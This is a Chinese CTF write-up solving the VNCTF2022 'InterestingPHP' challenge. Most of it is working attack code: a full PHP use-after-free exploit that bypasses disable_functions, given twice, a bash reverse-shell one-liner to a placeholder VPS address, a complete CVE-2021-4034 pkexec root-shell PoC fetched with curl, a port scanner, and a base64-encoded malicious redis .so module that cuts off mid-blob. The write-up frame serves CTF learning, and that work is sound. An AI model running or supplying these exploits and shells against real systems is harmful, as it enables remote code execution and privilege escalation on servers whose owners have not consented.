VNCTF&36D杯部分复现

VNCTF2022

InterestingPHP

进入题目,一句话木马

phpinfo没回显

image-20220720134529007

应该是禁用了很多函数,利用其他方式来读取配置信息

var_dump(get_cfg_var("disable_functions"));
var_dump(get_cfg_var("open_basedir"));
var_dump(ini_get_all()); //获取所有配置信息

image-20220720134811442

使用scandir扫描目录,发现secret.rdb,是redis的数据文件

image-20220720135315055

所以此题有两种解法

解法一(bypass绕过)

github上by_pass脚本绕过disbale_function

<?php
pwn('uname -a');   //这里填要执行的命令

function pwn($cmd) {
    define('LOGGING', false);
    define('CHUNK_DATA_SIZE', 0x60);
    define('CHUNK_SIZE', ZEND_DEBUG_BUILD ? CHUNK_DATA_SIZE + 0x20 : CHUNK_DATA_SIZE);
    define('FILTER_SIZE', ZEND_DEBUG_BUILD ? 0x70 : 0x50);
    define('STRING_SIZE', CHUNK_DATA_SIZE - 0x18 - 1);
    define('CMD', $cmd);
    for($i = 0; $i < 10; $i++) {
        $groom[] = Pwn::alloc(STRING_SIZE);
    }
    stream_filter_register('pwn_filter', 'Pwn');
    $fd = fopen('php://memory', 'w');
    stream_filter_append($fd,'pwn_filter');
    fwrite($fd, 'x');
}

class Helper { public $a, $b, $c; }
class Pwn extends php_user_filter {
    private $abc, $abc_addr;
    private $helper, $helper_addr, $helper_off;
    private $uafp, $hfp;

    public function filter($in, $out, &$consumed, $closing) {
        if($closing) return;
        stream_bucket_make_writeable($in);
        $this->filtername = Pwn::alloc(STRING_SIZE);
        fclose($this->stream);
        $this->go();
        return PSFS_PASS_ON;
    }

    private function go() {
        $this->abc = &$this->filtername;

        $this->make_uaf_obj();

        $this->helper = new Helper;
        $this->helper->b = function($x) {};

        $this->helper_addr = $this->str2ptr(CHUNK_SIZE * 2 - 0x18) - CHUNK_SIZE * 2;
        $this->log("helper @ 0x%x", $this->helper_addr);

        $this->abc_addr = $this->helper_addr - CHUNK_SIZE;
        $this->log("abc @ 0x%x", $this->abc_addr);

        $this->helper_off = $this->helper_addr - $this->abc_addr - 0x18;

        $helper_handlers = $this->str2ptr(CHUNK_SIZE);
        $this->log("helper handlers @ 0x%x", $helper_handlers);

        $this->prepare_leaker();

        $binary_leak = $this->read($helper_handlers + 8);
        $this->log("binary leak @ 0x%x", $binary_leak);
        $this->prepare_cleanup($binary_leak);

        $closure_addr = $this->str2ptr($this->helper_off + 0x38);
        $this->log("real closure @ 0x%x", $closure_addr);

        $closure_ce = $this->read($closure_addr + 0x10);
        $this->log("closure class_entry @ 0x%x", $closure_ce);

        $basic_funcs = $this->get_basic_funcs($closure_ce);
        $this->log("basic_functions @ 0x%x", $basic_funcs);

        $zif_system = $this->get_system($basic_funcs);
        $this->log("zif_system @ 0x%x", $zif_system);

        $fake_closure_off = $this->helper_off + CHUNK_SIZE * 2;
        for($i = 0; $i < 0x138; $i += 8) {
            $this->write($fake_closure_off + $i, $this->read($closure_addr + $i));
        }
        $this->write($fake_closure_off + 0x38, 1, 4);

        $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
        $this->write($fake_closure_off + $handler_offset, $zif_system);

        $fake_closure_addr = $this->helper_addr + $fake_closure_off - $this->helper_off;
        $this->write($this->helper_off + 0x38, $fake_closure_addr);
        $this->log("fake closure @ 0x%x", $fake_closure_addr);

        $this->cleanup();
        ($this->helper->b)(CMD);
    }

    private function make_uaf_obj() {
        $this->uafp = fopen('php://memory', 'w');
        fwrite($this->uafp, pack('QQQ', 1, 0, 0xDEADBAADC0DE));
        for($i = 0; $i < STRING_SIZE; $i++) {
            fwrite($this->uafp, "\x00");
        }
    }

    private function prepare_leaker() {
        $str_off = $this->helper_off + CHUNK_SIZE + 8;
        $this->write($str_off, 2);
        $this->write($str_off + 0x10, 6);

        $val_off = $this->helper_off + 0x48;
        $this->write($val_off, $this->helper_addr + CHUNK_SIZE + 8);
        $this->write($val_off + 8, 0xA);
    }

    private function prepare_cleanup($binary_leak) {
        $ret_gadget = $binary_leak;
        do {
            --$ret_gadget;
        } while($this->read($ret_gadget, 1) !== 0xC3);
        $this->log("ret gadget = 0x%x", $ret_gadget);
        $this->write(0, $this->abc_addr + 0x20 - (PHP_MAJOR_VERSION === 8 ? 0x50 : 0x60));
        $this->write(8, $ret_gadget);
    }

    private function read($addr, $n = 8) {
        $this->write($this->helper_off + CHUNK_SIZE + 16, $addr - 0x10);
        $value = strlen($this->helper->c);
        if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
        return $value;
    }

    private function write($p, $v, $n = 8) {
        for($i = 0; $i < $n; $i++) {
            $this->abc[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    private function get_basic_funcs($addr) {
        while(true) {
            // In rare instances the standard module might lie after the addr we're starting
            // the search from. This will result in a SIGSGV when the search reaches an unmapped page.
            // In that case, changing the direction of the search should fix the crash.
            // $addr += 0x10;
            $addr -= 0x10;
            if($this->read($addr, 4) === 0xA8 &&
                in_array($this->read($addr + 4, 4),
                    [20151012, 20160303, 20170718, 20180731, 20190902, 20200930])) {
                $module_name_addr = $this->read($addr + 0x20);
                $module_name = $this->read($module_name_addr);
                if($module_name === 0x647261646e617473) {
                    $this->log("standard module @ 0x%x", $addr);
                    return $this->read($addr + 0x28);
                }
            }
        }
    }

    private function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = $this->read($addr);
            $f_name = $this->read($f_entry, 6);
            if($f_name === 0x6d6574737973) {
                return $this->read($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry !== 0);
    }

    private function cleanup() {
        $this->hfp = fopen('php://memory', 'w');
        fwrite($this->hfp, pack('QQ', 0, $this->abc_addr));
        for($i = 0; $i < FILTER_SIZE - 0x10; $i++) {
            fwrite($this->hfp, "\x00");
        }
    }

    private function str2ptr($p = 0, $n = 8) {
        $address = 0;
        for($j = $n - 1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($this->abc[$p + $j]);
        }
        return $address;
    }

    private function ptr2str($ptr, $n = 8) {
        $out = '';
        for ($i = 0; $i < $n; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    private function log($format, $val = '') {
        if(LOGGING) {
            printf("{$format}\n", $val);
        }
    }

    static function alloc($size) {
        return str_shuffle(str_repeat('A', $size));
    }
}

因为fwrite 被ban了,所以用fputs替代

pwn('whoami');

function pwn($cmd) {
    define('LOGGING', false);
    define('CHUNK_DATA_SIZE', 0x60);
    define('CHUNK_SIZE', ZEND_DEBUG_BUILD ? CHUNK_DATA_SIZE + 0x20 : CHUNK_DATA_SIZE);
    define('FILTER_SIZE', ZEND_DEBUG_BUILD ? 0x70 : 0x50);
    define('STRING_SIZE', CHUNK_DATA_SIZE - 0x18 - 1);
    define('CMD', $cmd);
    for($i = 0; $i < 10; $i++) {
        $groom[] = Pwn::alloc(STRING_SIZE);
    }
    stream_filter_register('pwn_filter', 'Pwn');
    $fd = fopen('php://memory', 'w');
    stream_filter_append($fd,'pwn_filter');
    fputs($fd, 'x');
}

class Helper { public $a, $b, $c; }
class Pwn extends php_user_filter {
    private $abc, $abc_addr;
    private $helper, $helper_addr, $helper_off;
    private $uafp, $hfp;

    public function filter($in, $out, &$consumed, $closing) {
        if($closing) return;
        stream_bucket_make_writeable($in);
        $this->filtername = Pwn::alloc(STRING_SIZE);
        fclose($this->stream);
        $this->go();
        return PSFS_PASS_ON;
    }

    private function go() {
        $this->abc = &$this->filtername;

        $this->make_uaf_obj();

        $this->helper = new Helper;
        $this->helper->b = function($x) {};

        $this->helper_addr = $this->str2ptr(CHUNK_SIZE * 2 - 0x18) - CHUNK_SIZE * 2;
        $this->log("helper @ 0x%x", $this->helper_addr);

        $this->abc_addr = $this->helper_addr - CHUNK_SIZE;
        $this->log("abc @ 0x%x", $this->abc_addr);

        $this->helper_off = $this->helper_addr - $this->abc_addr - 0x18;

        $helper_handlers = $this->str2ptr(CHUNK_SIZE);
        $this->log("helper handlers @ 0x%x", $helper_handlers);

        $this->prepare_leaker();

        $binary_leak = $this->read($helper_handlers + 8);
        $this->log("binary leak @ 0x%x", $binary_leak);
        $this->prepare_cleanup($binary_leak);

        $closure_addr = $this->str2ptr($this->helper_off + 0x38);
        $this->log("real closure @ 0x%x", $closure_addr);

        $closure_ce = $this->read($closure_addr + 0x10);
        $this->log("closure class_entry @ 0x%x", $closure_ce);

        $basic_funcs = $this->get_basic_funcs($closure_ce);
        $this->log("basic_functions @ 0x%x", $basic_funcs);

        $zif_system = $this->get_system($basic_funcs);
        $this->log("zif_system @ 0x%x", $zif_system);

        $fake_closure_off = $this->helper_off + CHUNK_SIZE * 2;
        for($i = 0; $i < 0x138; $i += 8) {
            $this->write($fake_closure_off + $i, $this->read($closure_addr + $i));
        }
        $this->write($fake_closure_off + 0x38, 1, 4);

        $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
        $this->write($fake_closure_off + $handler_offset, $zif_system);

        $fake_closure_addr = $this->helper_addr + $fake_closure_off - $this->helper_off;
        $this->write($this->helper_off + 0x38, $fake_closure_addr);
        $this->log("fake closure @ 0x%x", $fake_closure_addr);

        $this->cleanup();
        ($this->helper->b)(CMD);
    }

    private function make_uaf_obj() {
        $this->uafp = fopen('php://memory', 'w');
        fputs($this->uafp, pack('QQQ', 1, 0, 0xDEADBAADC0DE));
        for($i = 0; $i < STRING_SIZE; $i++) {
            fputs($this->uafp, "\x00");
        }
    }

    private function prepare_leaker() {
        $str_off = $this->helper_off + CHUNK_SIZE + 8;
        $this->write($str_off, 2);
        $this->write($str_off + 0x10, 6);

        $val_off = $this->helper_off + 0x48;
        $this->write($val_off, $this->helper_addr + CHUNK_SIZE + 8);
        $this->write($val_off + 8, 0xA);
    }

    private function prepare_cleanup($binary_leak) {
        $ret_gadget = $binary_leak;
        do {
            --$ret_gadget;
        } while($this->read($ret_gadget, 1) !== 0xC3);
        $this->log("ret gadget = 0x%x", $ret_gadget);
        $this->write(0, $this->abc_addr + 0x20 - (PHP_MAJOR_VERSION === 8 ? 0x50 : 0x60));
        $this->write(8, $ret_gadget);
    }

    private function read($addr, $n = 8) {
        $this->write($this->helper_off + CHUNK_SIZE + 16, $addr - 0x10);
        $value = strlen($this->helper->c);
        if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
        return $value;
    }

    private function write($p, $v, $n = 8) {
        for($i = 0; $i < $n; $i++) {
            $this->abc[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    private function get_basic_funcs($addr) {
        while(true) {
            // In rare instances the standard module might lie after the addr we're starting
            // the search from. This will result in a SIGSGV when the search reaches an unmapped page.
            // In that case, changing the direction of the search should fix the crash.
            // $addr += 0x10;
            $addr -= 0x10;
            if($this->read($addr, 4) === 0xA8 &&
                in_array($this->read($addr + 4, 4),
                    [20151012, 20160303, 20170718, 20180731, 20190902, 20200930])) {
                $module_name_addr = $this->read($addr + 0x20);
                $module_name = $this->read($module_name_addr);
                if($module_name === 0x647261646e617473) {
                    $this->log("standard module @ 0x%x", $addr);
                    return $this->read($addr + 0x28);
                }
            }
        }
    }

    private function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = $this->read($addr);
            $f_name = $this->read($f_entry, 6);
            if($f_name === 0x6d6574737973) {
                return $this->read($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry !== 0);
    }

    private function cleanup() {
        $this->hfp = fopen('php://memory', 'w');
        fputs($this->hfp, pack('QQ', 0, $this->abc_addr));
        for($i = 0; $i < FILTER_SIZE - 0x10; $i++) {
            fputs($this->hfp, "\x00");
        }
    }

    private function str2ptr($p = 0, $n = 8) {
        $address = 0;
        for($j = $n - 1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($this->abc[$p + $j]);
        }
        return $address;
    }

    private function ptr2str($ptr, $n = 8) {
        $out = '';
        for ($i = 0; $i < $n; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    private function log($format, $val = '') {
        if(LOGGING) {
            printf("{$format}\n", $val);
        }
    }

    static function alloc($size) {
        return str_shuffle(str_repeat('A', $size));
    }
}

上传时注意几点

1.选择multipart/form-data
2.——WebKitFormBoundary 最后面的——要去掉
3.添加 Content-Disposition: form-data; name=”构造的shell参数名”
4.去掉<?php

image-20220720145831390

拿flag权限不够

image-20220720145950468

反弹shell

bash -c 'exec bash -i &>/dev/tcp/your VPSIP/PORT <&1'

image-20220720171936060

发现权限不够,用pkexec提权,CVE-2021-4034

POC

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>

void fatal(char *f) {
    perror(f);
    exit(-1);
}

void compile_so() {
    FILE *f = fopen("payload.c", "wb");
    if (f == NULL) {
        fatal("fopen");
    }

    char so_code[]=
        "#include <stdio.h>\n"
        "#include <stdlib.h>\n"
        "#include <unistd.h>\n"
        "void gconv() {\n"
        "  return;\n"
        "}\n"
        "void gconv_init() {\n"
        "  setuid(0); seteuid(0); setgid(0); setegid(0);\n"
        "  static char *a_argv[] = { \"sh\", NULL };\n"
        "  static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n"
        "  execve(\"/bin/sh\", a_argv, a_envp);\n"
        "  exit(0);\n"
        "}\n";

    fwrite(so_code, strlen(so_code), 1, f);
    fclose(f);

    system("gcc -o payload.so -shared -fPIC payload.c");
}

int main(int argc, char *argv[]) {
    struct stat st;
    char *a_argv[]={ NULL };
    char *a_envp[]={
        "lol",
        "PATH=GCONV_PATH=.",
        "LC_MESSAGES=en_US.UTF-8",
        "XAUTHORITY=../LOL",
        "GIO_USE_VFS=",
        NULL
    };

    printf("[~] compile helper..\n");
    compile_so();

    if (stat("GCONV_PATH=.", &st) < 0) {
        if(mkdir("GCONV_PATH=.", 0777) < 0) {
            fatal("mkdir");
        }
        int fd = open("GCONV_PATH=./lol", O_CREAT|O_RDWR, 0777); 
        if (fd < 0) {
            fatal("open");
        }
        close(fd);
    }

    if (stat("lol", &st) < 0) {
        if(mkdir("lol", 0777) < 0) {
            fatal("mkdir");
        }
        FILE *fp = fopen("lol/gconv-modules", "wb");
        if(fp == NULL) {
            fatal("fopen");
        }
        fprintf(fp, "module  UTF-8//    INTERNAL    ../payload    2\n");
        fclose(fp);
    }
    printf("[~] maybe get shell now?\n");
    execve("/usr/bin/pkexec", a_argv, a_envp);
}
curl http://xxx/shell.c > /tmp/poc.c #通过curl下载到/tmp目录下,只有tmp目录才有权限进行文件写入
cd /tmp
gcc poc.c -o poc #编译为可执行文件
./poc

提权成功,拿到flag

img

解法二(redis加载恶意.so文件)

前面扫目录的时候发现了redis文件

image-20220721112819689

secret.rdb

REDIS0008�	redis-ver4.0.9�
redis-bits�@�ctime³��a�used-mem€� �aof-preamble� � �  sercetye_w4nt_a_gir1fri3nd��nR�K��S

所以密码应该为ye_w4nt_a_gir1fri3nd

redis默认端口为6379,结果发现并不是,所以需要扫描端口

<?php
highlight_file(__FILE__);
for($i=0;$i<65535;$i++) {
  $t=stream_socket_server("tcp://0.0.0.0:".$i,$ee,$ee2);
  if($ee2 === "Address already in use") {
    var_dump($i);
  }
}

利用file_put_contents上传脚本,需要base64一下

/GET
?exp=file_put_contents('shell.php',base64_decode($_POST['shell']));

/POST
shell=PD9waHAKaGlnaGxpZ2h0X2ZpbGUoX19GSUxFX18pOwpmb3IoJGk9MDskaTw2NTUzNTskaSsrKSB7CiAgJHQ9c3RyZWFtX3NvY2tldF9zZXJ2ZXIoInRjcDovLzAuMC4wLjA6Ii4kaSwkZWUsJGVlMik7CiAgaWYoJGVlMiA9PT0gIkFkZHJlc3MgYWxyZWFkeSBpbiB1c2UiKSB7CiAgICB2YXJfZHVtcCgkaSk7CiAgfQp9

image-20220721113644104

找到redis端口8888

先利用file_put_contents上传恶意so文件

?exp=file_put_contents('shell.so',base64_decode($_POST['shell']));

image-20220721125744982

需要先将so文件进行base64编码

f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAgCgAAAAAAABAAAAAAAAAACCnAAAAAAAAAAAAAEAAOAAFAEAAGAAXAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHEgAAAAAAAAcSAAAAAAAAAAAIAAAAAAAAQAAAAYAAACgTgAAAAAAAKBOIAAAAAAAoE4gAAAAAADwAQAAAAAAANAFAAAAAAAAAAAgAAAAAAACAAAABgAAAKBOAAAAAAAAoE4gAAAAAACgTiAAAAAAAGABAAAAAAAAYAEAAAAAAAAIAAAAAAAAAFHldGQGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAUuV0ZAQAAACgTgAAAAAAAKBOIAAAAAAAoE4gAAAAAABgAQAAAAAAAGABAAAAAAAAAQAAAAAAAACDAAAAkgAAAAAAAAA0AAAAAAAAAFYAAAB1AAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAB0AAACDAAAAAAAAAAAAAAAJAAAANQAAAEUAAAAxAAAAEQAAAA0AAAAeAAAAcAAAAAAAAAABAAAAAAAAABQAAABkAAAAAAAAAAUAAAAfAAAAAAAAABgAAAAlAAAAAAAAAAAAAAAKAAAAAAAAAGsAAAAOAAAAPwAAAEAAAACPAAAAAAAAAGgAAAB8AAAAAAAAAEEAAABDAAAAAAAAAJAAAABCAAAAXwAAAEYAAAAAAAAAAAAAAH4AAAAAAAAAbwAAAAsAAAAAAAAAJwAAADcAAAAAAAAAAAAAAIgAAAAqAAAAjQAAAAAAAAA4AAAAPQAAADkAAAAAAAAAhgAAAAAAAABSAAAAkQAAABYAAABbAAAAXQAAAFgAAAA6AAAAAAAAAFEAAAAAAAAAPgAAAEQAAAAAAAAABwAAAAAAAAAAAAAALAAAABkAAAAuAAAAAgAAAAAAAABjAAAAiQAAAAAAAACLAAAAgAAAAFUAAABmAAAAagAAAAAAAABXAAAAhwAAAIEAAAASAAAAAAAAAAAAAAAyAAAASwAAACMAAABlAAAAAAAAAIQAAAAPAAAAewAAAGcAAAB2AAAAXgAAABwAAAAGAAAAOwAAAIUAAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWQAAAAAAAAAAAAAAcwAAAGEAAAAAAAAAVAAAABAAAABpAAAARwAAAAAAAABMAAAAAAAAAAAAAAAAAAAAAAAAAIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAvAAAAAAAAAAAAAAAAAAAAAAAAAFMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAG0AAAAAAAAAAAAAAAAAAAAAAAAAcgAAABoAAAAAAAAAAAAAAFoAAABPAAAAKQAAAGIAAAAzAAAAMAAAAAAAAAAtAAAAAAAAAEoAAAAmAAAAAAAAABUAAAAAAAAAcQAAAAAAAAB0AAAATgAAAAAAAAAAAAAAjgAAAAAAAABuAAAAJAAAAAAAAAAAAAAAKwAAAEkAAAAMAAAAAAAAAAAAAAAhAAAAAAAAAH0AAAAAAAAAggAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFwAAADYAAAAAAAAAigAAAHkAAAAAAAAAKAAAAAAAAAAAAAAAAAAAABMAAAAEAAAAGwAAAAAAAAB%2FAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAdwAAAAAAAAADAAAAAAAAAAAAAAAAAAAATQAAAAAAAAB6AAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAiAAAAAAAAAFwAAAAAAAAAAAAAAHgAAAAAAAAAYQAAABAAAAAQAAAACgAAAKBIAYAEUJCQyIABEI4QgAAQACQACIYJABCMggQgBxQAMAyIYAwtQKEJABJAyQwIAECgI1AQAkUGAIiEMQMUSgQOIAIIAYIAGYAYMpny4CQAaRRQvBAEAkMQACiMKRiAEAERghAIQAIAqAWNqIMzEAiQBCAKEEq6D0EANaQAADAgEAAAABIAAAAUAAAAFwAAABkAAAAbAAAAAAAAAAAAAAAdAAAAIAAAAAAAAAAhAAAAIwAAACQAAAAmAAAAJwAAACgAAAAqAAAALAAAAAAAAAAtAAAALwAAADAAAAAyAAAAMwAAAAAAAAA0AAAANQAAADYAAAA4AAAAOgAAADsAAAA8AAAAPgAAAAAAAABAAAAAQQAAAEIAAABDAAAARAAAAEYAAABHAAAASQAAAEwAAAAAAAAAUAAAAFIAAABWAAAAAAAAAFgAAABZAAAAWgAAAFsAAABcAAAAXgAAAAAAAABfAAAAYAAAAAAAAABhAAAAYgAAAGgAAABpAAAAagAAAAAAAABrAAAAAAAAAG0AAABuAAAAcAAAAHEAAAByAAAAdAAAAHcAAAAAAAAAeAAAAHkAAAB7AAAAAAAAAH0AAAB%2BAAAAfwAAAAAAAAAAAAAAgAAAAIIAAACDAAAAhAAAAAAAAACHAAAAiAAAAIsAAACOAAAAkAAAAJEAAAAAAAAAAAAAAGy%2BKEaB4qkFZgxPJz%2FQZyPQV53vrseSTF23odFyYoXrS0OOU%2BBqniWfwThxHKnkoKtUdV5kcuVRsqRuSuFd%2FA7PLJ71Pk3jMZvXmPJlho5TYkCYhimJg9iDUiisSw%2Bwtvot5XOXMgG%2FBIgztv0bXJYrFdJIIqELwPt13ybppIWfRlZCX8WO%2BQ43uLuV7UlCIlsXTNLdU5aGONll87dXrv9kfu%2BYCY8NI0NF1ewLKTmzqCtC6Y3Jj5QogomBYZ8m1K%2BMI7xn1s8%2BtZNn1tVuWkUsfMz810TZSGGd4K6QGdmTu1WdNjZAEoTKEMdjsZJgadp%2BcSeGam%2FybKdCWZ1FF0e6E2jC5WhW7vaphGqqKih8UJ4VNm0cypjA12ekc3ncJtlxWBzPzXqF9agw%2BNt%2FbE5qAew7FxFJ77vjknwP8E4CR%2B%2B52l2ED9AG0ObG8tDlUWJRcXgaDiHlquc7V6WlRbsBc0Uam34bj0uafXEACgVVh8%2Fen2eptXVi3PoOhebYk1fTxVu%2FclKiRjyU6oVIiosQ8ixM7K5t7p0OqPBTo3x7%2FZYO8%2FRL%2FA6zPdXBPBH0DguI%2FSKHZyvu8YWogDviG9YAvvdZ8XWqfx%2B1IBhDI73FFjPu%2FRC7M7axzNFIuUFmQlJ%2FVfcMgoY3297te25uzma62diTW4Mpk0xS2abT8lUjEcfdJmm39Q4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdAwAABIAAAAAAAAAAAAAAAAAAAAAAAAAlwwAABIAAAAAAAAAAAAAAAAAAAAAAAAAxwwAABIAAAAAAAAAAAAAAAAAAAAAAAAA3AwAABIAAAAAAAAAAAAAAAAAAAAAAAAAkAwAABIAAAAAAAAAAAAAAAAAAAAAAAAAigwAABIAAAAAAAAAAAAAAAAAAAAAAAAA4QwAABIAAAAAAAAAAAAAAAAAAAAAAAAAvQwAABIAAAAAAAAAAAAAAAAAAAAAAAAAbQwAABIAAAAAAAAAAAAAAAAAAAAAAAAAewwAABIAAAAAAAAAAAAAAAAAAAAAAAAAZwwAABIAAAAAAAAAAAAAAAAAAAAAAAAAuAwAABIAAAAAAAAAAAAAAAAAAAAAAAAAgwwAABIAAAAAAAAAAAAAAAAAAAAAAAAA1AwAABIAAAAAAAAAAAAAAAAAAAAAAAAAzQwAABIAAAAAAAAAAAAAAAAAAAAAAAAADQgAABEADgDwUCAAAAAAAAgAAAAAAAAAPQsAABEADgAIUSAAAAAAAAgAAAAAAAAA2QkAABEADgAwUiAAAAAAAAgAAAAAAAAAwwIAABEADgAYUyAAAAAAAAgAAAAAAAAA%2BgAAABEADgBgUiAAAAAAAAgAAAAAAAAAWAUAABEADgCYUiAAAAAAAAgAAAAAAAAA5QQAABEADgBoUyAAAAAAAAgAAAAAAAAAvAkAABEADgCwUCAAAAAAAAgAAAAAAAAAJwUAABEADgAoUiAAAAAAAAgAAAAAAAAAPQEAABEADgDQUyAAAAAAAAgAAAAAAAAAJggAABEADgAAVCAAAAAAAAgAAAAAAAAAuAEAABEADgDIUCAAAAAAAAgAAAAAAAAAPwgAABEADgAYVCAAAAAAAAgAAAAAAAAAUwkAABEADgDIUiAAAAAAAAgAAAAAAAAAVQQAABEADgBYUyAAAAAAAAgAAAAAAAAAfAoAABEADgD4UyAAAAAAAAgAAAAAAAAA8wUAABEADgAAUyAAAAAAAAgAAAAAAAAAogkAABEADgAoUSAAAAAAAAgAAAAAAAAAVggAABEADgAAUiAAAAAAAAgAAAAAAAAAEQUAABEADgCAUiAAAAAAAAgAAAAAAAAAJwAAABEADgAgUSAAAAAAAAgAAAAAAAAAVgYAABEADgDoUSAAAAAAAAgAAAAAAAAASwAAABEADgCoUCAAAAAAAAgAAAAAAAAAagkAABEADgDwUiAAAAAAAAgAAAAAAAAAbAQAABEADgDoUCAAAAAAAAgAAAAAAAAAOgQAABEADgBAUSAAAAAAAAgAAAAAAAAAAQcAABEADgDQUSAAAAAAAAgAAAAAAAAAfgEAABEADgAgUiAAAAAAAAgAAAAAAAAAxQUAABEADgCYUSAAAAAAAAgAAAAAAAAAEwAAABEADgCoUSAAAAAAAAgAAAAAAAAA2QUAABEADgAYUiAAAAAAAAgAAAAAAAAAvwQAABEADgDgUCAAAAAAAAgAAAAAAAAAgQgAABEADgCQUyAAAAAAAAgAAAAAAAAAAgwAABEADgAIVCAAAAAAAAgAAAAAAAAAxQAAABEADgBoUiAAAAAAAAgAAAAAAAAAiwAAABEADgCAUSAAAAAAAAgAAAAAAAAA8gkAABEADgCgUiAAAAAAAAgAAAAAAAAApwEAABEADgBoVCAAAAAAAAgAAAAAAAAAtQgAABEADgCIUSAAAAAAAAgAAAAAAAAAoAIAABEADgDAUSAAAAAAAAgAAAAAAAAApgoAABEADgCAUyAAAAAAAAgAAAAAAAAATwMAABEADgDoUyAAAAAAAAgAAAAAAAAABQ0AABAADQCQUCAAAAAAAAAAAAAAAAAAJAIAABEADgAoVCAAAAAAAAgAAAAAAAAA3AAAABEADgBwUSAAAAAAAAgAAAAAAAAA%2BQIAABEADgBQVCAAAAAAAAgAAAAAAAAAqAwAABIACQCDOAAAAAAAADsBAAAAAAAAdQYAABEADgDgUyAAAAAAAAgAAAAAAAAALAwAABEADgBIUyAAAAAAAAgAAAAAAAAA7gcAABEADgBAUyAAAAAAAAgAAAAAAAAAcQAAABEADgBwUyAAAAAAAAgAAAAAAAAAegsAABEADgC4UCAAAAAAAAgAAAAAAAAAkwEAABEADgC4UiAAAAAAAAgAAAAAAAAABwIAABEADgCIUyAAAAAAAAgAAAAAAAAArAMAABEADgDYUiAAAAAAAAgAAAAAAAAAvwoAABEADgCgUSAAAAAAAAgAAAAAAAAA4gIAABEADgAwVCAAAAAAAAgAAAAAAAAAXQwAABIACQAJNwAAAAAAAHoBAAAAAAAALQMAABEADgCQUSAAAAAAAAgAAAAAAAAAlgcAABEADgCwUSAAAAAAAAgAAAAAAAAAagMAABEADgCQUCAAAAAAAAgAAAAAAAAAFwkAABEADgDQUCAAAAAAAAgAAAAAAAAAAQAAABEADgBQUiAAAAAAAAgAAAAAAAAANgYAABEADgCoUiAAAAAAAAgAAAAAAAAAbgUAABEADgCoUyAAAAAAAAgAAAAAAAAA7AsAABEADgDwUyAAAAAAAAgAAAAAAAAAoAQAABEADgBQUSAAAAAAAAgAAAAAAAAAFAoAABEADgBgUSAAAAAAAAgAAAAAAAAAMgoAABEADgDQUiAAAAAAAAgAAAAAAAAAYgIAABEADgBIVCAAAAAAAAgAAAAAAAAAewIAABEADgD4UiAAAAAAAAgAAAAAAAAAmQYAABEADgBAVCAAAAAAAAgAAAAAAAAADA0AABAADgCQUCAAAAAAAAAAAAAAAAAAOAAAABEADgBYUSAAAAAAAAgAAAAAAAAAggQAABEADgA4USAAAAAAAAgAAAAAAAAAigMAABEADgDIUSAAAAAAAAgAAAAAAAAA6QgAABEADgCYUCAAAAAAAAgAAAAAAAAAzQYAABEADgB4UyAAAAAAAAgAAAAAAAAAGA0AABAADgBwVCAAAAAAAAAAAAAAAAAAtwsAABEADgDAUyAAAAAAAAgAAAAAAAAAqAAAABEADgDAUCAAAAAAAAgAAAAAAAAAAAkAABEADgAQUiAAAAAAAAgAAAAAAAAAFAEAABEADgB4USAAAAAAAAgAAAAAAAAAsQcAABEADgDgUSAAAAAAAAgAAAAAAAAAQwkAABEADgAIUyAAAAAAAAgAAAAAAAAA%2BwQAABEADgA4UyAAAAAAAAgAAAAAAAAA0AcAABEADgDIUyAAAAAAAAgAAAAAAAAAyAMAABEADgBgVCAAAAAAAAgAAAAAAAAAZgEAABEADgBAUiAAAAAAAAgAAAAAAAAAXgAAABEADgAQUyAAAAAAAAgAAAAAAAAA7QEAABEADgAwUSAAAAAAAAgAAAAAAAAAmAgAABEADgDYUCAAAAAAAAgAAAAAAAAAZwoAABEADgCQUiAAAAAAAAgAAAAAAAAAgAcAABEADgC4USAAAAAAAAgAAAAAAAAAFwwAABEADgAYUSAAAAAAAAgAAAAAAAAAAAsAABEADgBoUSAAAAAAAAgAAAAAAAAALQkAABEADgAgVCAAAAAAAAgAAAAAAAAA6AwAABIACQC%2BOQAAAAAAANQAAAAAAAAAbQgAABEADgAQUSAAAAAAAAgAAAAAAAAA4gMAABEADgCIUiAAAAAAAAgAAAAAAAAAlwsAABEADgB4UiAAAAAAAAgAAAAAAAAARQwAABEADgDgUiAAAAAAAAgAAAAAAAAAXAsAABEADgAwUyAAAAAAAAgAAAAAAAAAZAcAABEADgBIUiAAAAAAAAgAAAAAAAAAKQEAABEADgA4UiAAAAAAAAgAAAAAAAAAkQoAABEADgCgUCAAAAAAAAgAAAAAAAAAzAgAABEADgAIUiAAAAAAA